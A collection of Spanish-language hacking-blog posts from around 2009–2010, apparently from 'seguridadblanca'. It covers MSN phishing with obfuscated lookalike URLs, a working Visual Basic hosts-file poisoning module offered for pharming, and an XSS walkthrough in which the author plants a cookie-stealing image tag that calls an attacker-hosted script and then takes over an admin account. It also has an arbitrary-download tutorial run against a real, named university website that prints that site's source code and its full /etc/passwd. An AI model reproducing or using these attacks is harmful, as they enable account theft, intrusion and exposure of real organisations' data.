Análisis - Phishing de MSN

Hoy quiero tratar de dar unas pautas del motivo por el cual es tan fácil engañar gente para que nos de su clave de msn con phishing...


En primera, vamos a hacer la comparación con como se ve facebook un login...


facebook:

http://www.facebook.com/login.php


Hotmail:

http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1263246246&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=3082&id=64855&mkt=es-es


Análisis de los login... el de Hotmail pues como nos damos cuenta está en un subdominio, nos da variables cualquieras, tiene una especie de variable que llama al sitio http://mail.live.com/default.aspx o convoca por algún motivo o algo.


Gracias a Esto podríamos usar una técnica conocida como URL OBFUSCATION, ahora les voy a dar un ejemplo de como podriamos hacer eso

digamos que nos compramos el dominio liives.com o compramos loginlive-account.com algo por el estilo ahora vamos a ponerle un sub-dominio a nuestro dominio comprado


http://msn.loginlive-account.com

ahora subimos nuestro SCAM

http://msn.loginlive-account.com/windows/msn/messenger/connect/index.php

OFUSCADA:

http%3A%2F%2Fmsn%2Eloginlive%2Daccount%2Ecom%2Fwindows%2Fmsn%2Fmessenger%2Fconnect%2Findex%2Ephp

Otra opción:

http://0/wind%6fw%73/ms%6e/mes%73eng%65r/%63o%6ene%63t/i%6e%64ex.%70%68%70


Como ofuscamos:

http://www.keyone.co.uk/tools-url-encoder.asp

o sino:

http://funkyfilters.com/url/obfuscation/


Eso en cuestion al Login...


Ahora las actualizaciones de imagenes, por ejemplo yo siempre ando probando las nuevas cosas que me entero que salen entonces por ahí, en mi msn tengo mucha gente y por ahí escucho nuevo SCAM de Facebook entonces yo digo mm ¿nuevo? lo que pasa es que Facebook en muchas ocaciones cambia el lugar donde hostea sus imágenes, lo hacia mas seguido antes pero ahora no tanto, esto es como una medida de seguridad...


Otro aspecto que hace tan vulnerable a hotmail son las páginas del tipo www.quienteadmite.com en esta página se supone que se da el servicio de ver quien te tiene bloqueado, la gente no conocedora del tema se logguea y ve quienes le han dado a no admitir y pues gracias a esto muchos tienen sus messengers pero otros también entran.

este ha sido un pequeño análisis de por que es tan común robar cuentas de msn...


Saludos
Dr.White

El Hacker (Amante de la Seguridad Informática) Élite Perú

Perverths0 el Dueño de CuscoSoft ha decidido realizar un concurso para que la gente vote y decida quien es el mas amante de la seguridad informática en perú, ya estoy propuesto como candidato y me gustaría mucho ganar, no para la fama sino para saber realmente si hay gente que me considera, espero ustedes voten por mio, la competencia estoy seguro será fuerte, pero no me rendiré, se trata de competir no te ganar pero si gano no me quejo.


Espero contar con su voto, solo deben votar por mi en cuscosoft también si lo desean pueden proponer sus candidatos para que ganen, aún no se si habrá mas premio que el nombramiento pero para mi eso sería suficiente...


Espero Voten Por Mí...


Visiten Cuscosoft es muy buena página

Saludos
Dr.white

Hosts Poisoning T00l

Antes que todo quería pedir disculpas por escribir tan poco pero ando en época de examenes y pues no tengo tiempo de escribir pero ahora le quiero dar unos minutitos al blog para enseñarles esta t00l tan curiosa que he encontrado...


Dando Vueltas por blogs de malware y troyanos en general, lógico solo para mantenerme actualizado, di con que en Professional Hacker han puesto un módulo con el cual se puede hacer hosts poisoning, que quiero decir con hosts poisoning, ya hemos hablado antes sobre el pharming y esto es pharming, lo que hacemos es modificar el archivo /etc/hosts para que crean que al entrar en una página está todo bien sin embargo están navegando en un fake pero en el browser dice que están en la página real...


Esta técnica se usa para la estafa, la mayoría de veces para robo de cuentas bancarias, esta técnica como antes mencionado se llama pharming, ahora si, aquí podemos ver el ejemplo de un programa que usa lo mas común que es un bat pero lo que les voy a presentar es un módulo que he estado analizando y al parecer funciona a la perfección, lo digo por que los batch para hacer esta función en windows 7 y vista no funcionan bien, por eso el módulo que les daré es tan importante, tiene para hacerlo a windows 7 y windows vista.


el módulo solo te facilita el poder escribir ek módulo pero te da la opción de que hagas un programita con mas funciones...


El Code:


'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''' HOSTS POISONING MODULE BY XA0S '''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Creado por Xa0s '
' www.professional-hacker.org '
' Modulo encargado de editar el archivo Hosts de Windows '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Public Function hosts(insertar As String, windows As String) As String
Dim w2 As String
If windows = 95 Then
w2 = "C:\Windows\hosts"
Else
If windows = 98 Then
w2 = "C:\Windows\hosts"
Else
If windows = "Me" Then
w2 = "C:\Windows\hosts"
Else
If windows = "NT" Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = 2000 Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = "XP" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = 2003 Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "Vista" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "7" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
MsgBox "Error de Sistema Operativo", vbCritical, "Hosts Poisoning Module By Xa0s"
Exit Function
End If
End If
End If
End If
End If
End If
End If
End If
End If
Open w2 For Output As #1
Print #1, "// Hosts Poisoning Module By Xa0s //"
Print #1, insertar
Close #1
End Function

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''' MODO DE USO ''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' call hosts(AQUI LO QUE QUIERAS ESCRIBIR EN EL HOSTS, SISTEMA OPERATIVO) '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' El sistema operativo puede ser: '
'--- 95, 98, ME, 2000, NT, 2003, XP, VISTA, 7 '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''


en el mismo código se especifica mucho...


espero esto les sirva por que yo se los doy con esta idea pero ustedes pueden usarlo para escribir otros archivos, uno nunca sabe algo como esto le pueda servir.


PD: el código no se ve todo pero solo hagan copy paste de lo que se supone está y luego peguenlo en un bloc de notas o en el ide de visual y ya, les saldrá el código mas grande que es el real.

Saludos
Dr.White

Procedimiento, Cuando un Xss se vuelve crítico.

Empezando este año con una entrada que creo que les ayudará a ver desde otra perspectiva un xss, en esta ocación les voy a enseñar como explotar un Xss para poder entrar...


Hace un tiempo escribí sobre como se hace para robar cookies con un xss y para los que se orientan con mi blog pues han de creer que yo enseñe robando masomenos con ingeniería social pero nosotros podemos hacer mas que eso... ahora les mostraré lo que podemos hacer...


mm el código que usaremos es el stándar por asi decirlo que tenemos en la otra entrada pero lo vamos a complementar con otras cosas... ahora si, hay muchas maneras de como poder entrar como administrador a una web con un xss o xsrf y la primera es robandole la cookie al administrador o moderador con ingeniería social + un Foro Vulnerable...


Asi como hago yo ustedes cuando quieran ver si una app es vulnerable procuren descargarlo y buscar código con errores, en casi todas las entradas pongo ejemplos de como se ve un código con error, o si quieren busquen el bug en exploit-db y ver si existe un xss o csrf a explotar... ahora si a la acción...


Tenemos nuestro Bug un Perfecto Xss para robar cookies está ubicado en el en el bbcode [img][/img] el problema con esto es que podemos poner cualquier tipo de imagen es decir jpg jpeg gif pero... php? mmm como podemos ver pregunté si se podía php, el php no es un tipo de imagen pero aun así los programadores cometieron ese error ahora a explotarlo, vamos a escribir una entrada, digamos en un foro de "hackers"...


Tema: Nuevo 0day :o
Content:

[img=http://miwebhostingparahackear.com/robocookie.php][/img]

Bueno amigos.................


EOF
------------------------


Listo como vemos acabamos de "ejecutar" nuestro código de robo de cookies y hemos comenzado a robar cookies y lógico lo que esté escrito en el post debe ser convincente luego vamos a ver quienes han caido... no puede ser... tenemos 20 sessiones que nervios... probemos a ver si alguna es del administrador, ahora despues de probar 13 sessiones:

Welcome Admin


Listo ya teniendo la administración podemos subir una shell como theme, etc pero bueno ahora les voy a mostrar otra situación... hace unos días un amigo me comentó de un 0day muy curioso... era en un chat php...


despues de analizar durante mucho rato el chat por que el no me quería decir del bug se me ocurrió ver los headers usando nuestro live http headers, y en el chat dijeron algo chistoso y yo use el emoticon "xD" y en eso vi que en uno de los headers post de los mensajes se veia algo como esto...



<img src="http://www.webserver.com/chat/files/emoticon10.jpg></img>


cuando lo vi dije no puede ser no creo que ese sea el bug...

cambie


<img src="http://www.webserver.com/chat/files/emoticon10.jpg></img>


por

test123...

y posteo eso intento lo primero con una redirección pero no aceptaba todos los tags entonces probe poner:



<img src="http://www.miwebhackeatodo.com/robo.php></img>


salio una [x] en ves de imagen y mientras escribian en el chat yo me iva sacando todas las cookies... como se dan cuenta hay veces que los errores son pura investigación y curiosidad... lo único que hice fue probar un poco y salio, ustedes también pueden hacer esto...


yo hoy les he enseñando esto con la etiqueta img pero se puede con un iframe, hipervínculo de flash y todo lo que ustedes se imaginen...


espero les sirva este tuto...


Saludos
Dr.White

Un Resumen del 2009

Comenzamos un Año de los mas dificiles para todos los ámbitos la crisis afectó a todos el mejor ejemplo es que la foca ya no será gratis...já este año lectores hemos pasado alti bajos juntos y me alegra ver saber como ha crecido poco a poco el blog, dando pasos lentos pero seguros, hemos perdido amigos que empezaron con nosotros, ahora hay uno nuevo pero no queremos irnos para el lado sentimental, les pongo el resumen de este año...

---------------------

Aprendimos a Spoofear User-Agent

Aprendimos sobre el Bluesnarfing


Aprendimos como funcionaba el Remote Code Execution


Aprendamos del Full Path Disclosure


Aprendimos a Configurar un archivo htaccess

Perverthso de CuscoSoft nos enseñó Sql Injection Básica

Jbyte de Jbyte-Security nos lo complementó con Injection a Sql Server


NitroNet Nos enseñó el Remote File Inclusion


Explicando el Path Trasversal


Comenté un poco del Reverse DNS


Ahora el Mass Defacemente


Robando Cookies con un Xss


El Hijacking


Expliqué el Cross Site Tracing

Aprendimos Login Bypass en el ISIL


Encontramos Xss en Tecsup


Nuestra Fanática


Vimos como se hacía Local Files Inclusion por Require()

LFI por uploader


Obtener Archivos del Servidor con Sql Injection


La Explicación de un Login Bypass


Remote Code Execution con Eval


Local File Disclosure


Argument Injection


Mi Exposición del LimaHack


Explique el Session Prediction


Session Fixation


Explique el XSRF


Insecure Permisions


Orientación del PHP al PenTest - CURL()


Insecure Cookie Handling


Nullbyte Poisoning


Sql Injection en ASP Ejempo Real


Descubrí un FPD en FaceBook


Expliqué el Cookie Poisoning


XSRF de Zer-Bits


Arbitrary Download + Full Source Disclosure de Zero-Bits


Espero Este Resumen les haya gustado ahora con mucho gusto y agradecimiento les digo...



Feliz Año Nuevo Que todo Sea bueno para Ustedes en todos los ámbitos, Espero no olviden seguridadblanca en el año que viene y esperamos el próximo año sea mejor para todos....

Happy Hacking =)




Saludos
Dr.White

Arbitary Download+Full Source Disclosure

Full Source Disclosure.



0x01. Introducción



En DDLR ya algunos habrán leído mi tutorial sobre “Full Path Disclosure”, bueno, ahora les vengo hablar un poco de otra vulnerabilidad llamada “Full Source Disclosure” que ha estado un poco polémico en #DDLR, gracias al video de 0o_Zeus_o0 muy bueno la verdad y el post de Gothic-x también excelente.

Esta vulnerabilidad ya la había leído un poco antes, pero bueno, les hare un tuto, viendo que muchos les intereso este tema.



0x02. ¿Qué es Arbitrary Downloader y Full Source Disclosure o FSD?




Arbitrary Downloader para descargar cualquier archivo del servidor junto con Full Source Disclosure que ve el CODIGO COMPLETO es una vulnerabilidad MUY vista por así decirlo todavía en la RED, y se encarga de descargar cualquier fichero del servidor sin estar logeado o tener permiso alguno, y con esto podemos ver el CODIGO FUENTE (SOURCE) de este para sacar mucha información, pero no es lo mismo darle al index.php “VER CODIGO FUENTE” en tu navegador, que con verla en esta vulnerabilidad, ya que este muestra el código ORIGINAL del servidor.



Esta vulnerabilidad se debe a la mala programación de las variables especiales para descargar un archivo interno, permitiéndonos descargar cualquier archivo del servidor sin estar logeado o tener permisos como dije arriba.



Gracias al DORK creado por Gothic-x podrán encontrar muchos websites vulnerables y también encontré uno para explicar en este tutorial.





0x03. Practica



La web que usaremos de ejemplo seria esta: “http://www.favaloro.edu.ar”, el site de un medico argentino (Gracias KikoArg).




Primero me paso a descargar el “index” para que vean la diferencia entre “SOURCE DISCLOSURE” y “VER CODIGO FUENTE DESDE EL NAVEGADOR”:



FULL SOURCE DISCLOSURE:

Pasamos hacer que el servidor nos descargue el index principal que sería:

http://www.favaloro.edu.ar/force-download.php?file=index.php



Lo descargamos y lo abrimos con nuestro editor:







VER CODIGO FUENTE:








No sale completo como pueden ver en la barra, pero igual pueden notar que es diferente muy diferente, por eso se le llama “FULL SOURCE”

Esta simple vulnerabilidad puede llegar a ser muy muy peligrosa, ya que podemos descargar “CUALQUIERRR” fichero del servidor, pero claro, poniendo el directorio hasta el fichero:



http://localhost/descargas.php?file=config.php

http://localhost/descargas.php?file=/admin/datos.php

Ya queda de tu conocimiento de un servidor o para sacar datos, podemos usarlo si es que el servidor es vulnerable otra vulnerabilidad llamada “FULL PATH DISCLOSURE”, entre otras cosas.

Como vimos en el código fuente del “index.php” desde FULL SOURCE DISCLOSURE, podemos ver otros directorios donde podemos acceder y sacar muchas cosas como:




inc/principal.php:

<? require_once('cnx/cnx.php');
 $principal = "SELECT * FROM novedades WHERE (PortadaNovedades = 2) OR (PortadaNovedades = 3)  
ORDER BY OrdenNovedades ASC LIMIT 0,5";
$principal2 = mysql_query($principal,$link);
?>
<div id="content"> 
<div id="novedades">
<div id="carrera">
<div class="principal-foto">
<p class="quote-it"><img src="images/favaloro3.jpg" align="left" />
&quot;A los j&oacute;venes les pido que entiendan que lo material  es temporario, lo que perdurar&aacute;
 para siempre ser&aacute;n los ideales y entre ellos la  gran convocatoria deber&iacute;a ser: 
educaci&oacute;n y desarrollo cient&iacute;fico en busca de  una sociedad en la que la equidad social sea lo prioritario&quot;.</p>   

<p class="allign-right">  Dr. Ren&eacute; G. Favaloro, Tel Aviv, Israel, 1995<br />
   Fotografia: Miguel Angel Generoso</p>
  </div>
 <div class="nov-box"> <h1></h1>

 <script src="Scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script type="text/javascript">
AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0','width','645','height','140','src','images/banner_general_645x140-1009','quality','high','pluginspage','http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash','movie','images/banner_general_645x140-1009' ); //end AC code
</script><noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="645" height="140">
<param name="movie" value="images/banner_general_645x140-1009.swf">
<param name="quality" value="high">
<embed src="images/banner_general_645x140-1009.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="645" height="140"></embed>

</object>
</noscript></div>    
  <? 
while($principal3 = mysql_fetch_array($principal2)) {  
echo "<div class=\"nov-box\">";
echo "<h1>".$principal3['TitulosNovedades']."</h1>";
echo "<p>".$principal3['CopeteNovedades']."</p>";
echo "<div class=\"nov-foot\"><a href=\"";
if ($principal3['LinkNovedades']=="") {    
echo "?inc=novedades&IDNovedades=".$principal3['IDNovedades'];
} else {
echo $principal3['LinkNovedades'];
}
echo "\">mas informaci&oacute;n</a></div>";echo "</div>";
}?> 

</div></div></div>

Algunos se preguntaran si sirven otros archivos como “/etc/passwd”, pues si, ejemplo:



http://www.favaloro.edu.ar/force-download.php?file=/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
admin:x:1000:1000:,,,:/home/admin:/bin/bash
identd:x:100:65534::/var/run/identd:/bin/false
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
telnetd:x:102:102::/nonexistent:/bin/false
mysql:x:1002:100::/home/mysql:/bin/bash
ftp:x:103:65534::/home/ftp:/bin/false
alias:x:1003:1002::/var/qmail/alias:/sbin/nologin
qmaild:x:1004:1002::/var/qmail:/sbin/nologin
qmaill:x:1005:1002::/var/qmail:/sbin/nologin
qmailp:x:1006:1002::/var/qmail:/sbin/nologin
qmailq:x:1007:1003::/var/qmail:/sbin/nologin
qmailr:x:1008:1003::/var/qmail:/sbin/nologin
qmails:x:1009:1003::/var/qmail:/sbin/nologin
vpopmail:x:1010:1004::/home/vpopmail:/sbin/nologin
bind:x:104:101::/var/cache/bind:/bin/false
favaloro:x:1014:100::/usr/local/apache2/htdocs/www.favaloro.edu.ar:/bin/bash
fundacion:x:1015:100::/usr/local/apache2/htdocs/www.fundacionfavaloro.org:/bin/bash
posgrado:x:1016:100::/usr/local/apache2/htdocs/www.favaloro.edu.ar/posgrado:/bin/bash
webmaster:x:1017:100::/usr/local/apache2/htdocs/:/bin/bash
gmj:x:1001:100::/home/gmj:/bin/bash
gaston:x:1018:0:GASTON:/home/gaston:/bin/bash
itfurf:x:1019:1006::/usr/local/apache2/htdocs/it.furf.com.ar/:/bin/bash
furf:x:1020:1007::/usr/local/apache2/htdocs/www.furf.com.ar:/bin/bash
hobbit:x:1021:1008::/usr/local/hobbit/:
backupfurf:x:1012:1012:,,,:/backup:/bin/bash
pricai:x:1013:1013:,,,:/usr/local/apache2/htdocs/pricai.com.ar:/bin/bash
ns1:x:1024:100::/home/ns1:
cei:x:1026:1026:,,,:/usr/local/apache2/htdocs/www.favaloro.edu.ar/COMUNICA:/bin/bash
congreso:x:1027:1027:,,,:/usr/local/apache2/htdocs/congresos.fundacionfavaloro.org:/bin/bash
cye:x:1025:1025:,,,:/usr/local/apache2/htdocs/www.fundacionfavaloro.org/cye:/bin/bash
proftpd:x:105:65534::/var/run/proftpd:/bin/false
favaloroftp:x:1029:1029:,,,:/usr/local/apache2/htdocs/www.favaloro.edu.ar/ftp:/bin/bash
ffavaloroftp:x:1030:1030:,,,:/usr/local/apache2/htdocs/www.fundacionfavaloro.org/ftp:/bin/bash
favaloro2:x:1031:50::/usr/local/apache2/htdocs/www2.favaloro.edu.ar:/bin/bash
ossec:x:1034:1034::/var/ossec:/bin/false
trimestral:x:1035:1035:,,,:/backup/trimestral:/bin/bash
campanas:x:1036:100::/usr/local/apache2/htdocs/www.favaloro.edu.ar/campanas:/bin/bash
dev:x:1022:1022:,,,:/usr/local/apache2/htdocs/dev.favaloro.edu.ar:/bin/bash
cuidatucorazon:x:1011:1011:,,,:/usr/local/apache2/htdocs/www.fundacionfavaloro.org/cuidatucorazon:/bin/bash
elvestuario:x:1023:1023:,,,:/usr/local/apache2/htdocs/www.favaloro.edu.ar/elvestuario:/bin/bash

Y muchas cosas más…




0x04. ¿Dónde está el Bug?



Bueno, no sigo mas, ya que no hay mucho que hablar, pero es bueno para los programadores y pentesters donde está el bug, pasaremos a descargar un archivo interesante: http://www.favaloro.edu.ar/force-download.php?file=force-download.php

<?php

$filename = $_GET['file'];

// required for IE, otherwise Content-disposition is ignored
if(ini_get('zlib.output_compression'))
  ini_set('zlib.output_compression', 'Off');

// addition by Jorg Weske
$file_extension = strtolower(substr(strrchr($filename,"."),1));

if( $filename == "" ) 
{
  echo "<html><title>eLouai's Download Script</title><body>ERROR: download file NOT SPECIFIED. USE force-download.php?file=filepath</body></html>";
  exit;
} elseif ( ! file_exists( $filename ) ) 
{
  echo "<html><title>eLouai's Download Script</title><body>ERROR: File not found. USE force-download.php?file=filepath</body></html>";
  exit;
};
switch( $file_extension )
{
  case "pdf": $ctype="application/pdf"; break;
  case "exe": $ctype="application/octet-stream"; break;
  case "zip": $ctype="application/zip"; break;
  case "doc": $ctype="application/msword"; break;
  case "xls": $ctype="application/vnd.ms-excel"; break;
  case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
  case "gif": $ctype="image/gif"; break;
  case "png": $ctype="image/png"; break;
  case "jpeg":
  case "jpg": $ctype="image/jpg"; break;
  default: $ctype="application/force-download";
}
header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers 
header("Content-Type: $ctype");
// change, added quotes to allow spaces in filenames, by Rajkumar Singh
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
readfile("$filename");
exit();

?>

Pueden notar que el archivo, no tiene validación protección “$filename = $_GET['file'];” y permite la descarga de cualquier archivo que se le ponga.





0x05. Conclusión



Bueno termine mi tuto, de esta vulnerabilidad no hay mucho que hablar, pero es bueno un tutorial, para los que no tienen idea de esto y puedan ver la FUERZA de esta vulnerabilidad tan peligrosa y buena, ya que es muy fácil y no es necesario hacer algo especial como otros métodos.



Si quieren saber mas de este método, pueden buscar en google y también los links que voy a dejar abajo.



0x06. Links interesantes


Video de 0o_ZeuS_o0 sobre esta vulnerabilidad (En el tutorial dice “FULL PATH DISCLOSURE”, pero es “FULL SOURCE” un error de escritura jeje).

http://www.youtube.com/watch?v=3c-pojLunmY&feature=player_embedded



Explotando Full Source Diclosure Bugueando "force-download.php" de Gothic-x.

http://gothicx.diosdelared.com/?coment=3762



Màs de Full Source Diclosure de Gothic-x.

http://gothicx.diosdelared.com/?coment=3759



Ilegalintrusion - #DDLR - #RE - GH - Seguridadblanca




Autor: Zero Bits

Fecha: 15/11/09

Como precaución

debido a que ataques que se han hecho en contra de seguridadblanca para evitar pérdidas he hecho un backup de seguridadblanca oficial para que en el caso de que en algún momento seguridadblanca cayera puedan acceder a todo el contenido...


Click aquí para ir al backup


mas vale previnir que lamentar...


Saludos
Dr.White